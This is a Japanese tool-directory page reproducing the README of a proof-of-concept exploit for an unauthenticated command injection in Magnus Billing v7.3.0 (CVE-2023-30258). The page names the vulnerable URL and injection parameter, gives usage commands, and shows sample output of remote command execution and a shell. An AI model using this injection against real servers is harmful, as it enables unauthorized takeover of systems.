Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC — Magnus Billing v7.3.0 における認証なしのコマンドインジェクション脆弱性。 | Kitploit
ツール/GitHubGitHub/estebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubestebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc

CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC

Magnus Billing v7.3.0 における認証なしのコマンドインジェクション脆弱性。

リポジトリを見る
116ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-30258 — Magnus Billing v7 コマンドインジェクション (PoC)

Magnus Billing v7.3.0 における認証不要のコマンドインジェクションの脆弱性。icepay.php の GET パラメータ democ はサニタイズなしでシェル関数に直接渡され、Webサーバーユーザーとして任意のコマンド実行を許します。このインジェクションはブラインドです — 出力はHTTPレスポンスに反映されません — そのため、このエクスプロイトは各コマンドの出力をWebルート内のファイルにリダイレクトし、HTTP経由で取得します。


動作の仕組み

  1. /mbilling/lib/icepay/icepay.php?democ=;<command>; にGETリクエストを送信します。
  2. コマンド出力をWebルート内のファイル (out.txt) にリダイレクトします。
  3. 出力ファイルをHTTP経由で取得し、結果を表示します。
  4. 終了時に出力ファイルを削除します。

ターゲットが異なるWebルートパスを使用している場合は、スクリプト上部の OUTPUT_FILE を調整してください。

必要条件

  • Python 3
  • 依存関係のインストール:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

使用方法

root@kitploit:~
python3 exploit.py -t http://TARGET

例:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

参考文献

  • CVE-2023-30258
  • EDB-52170
  • Tinashe Matanda 氏によるオリジナル PoC

クレジット

  • 発見およびオリジナルエクスプロイト: Tinashe Matanda (SadNinja) / CodeSecLab
  • クリーンアップおよびインタラクティブシェル: Esteban Zárate
ツールをダウンロード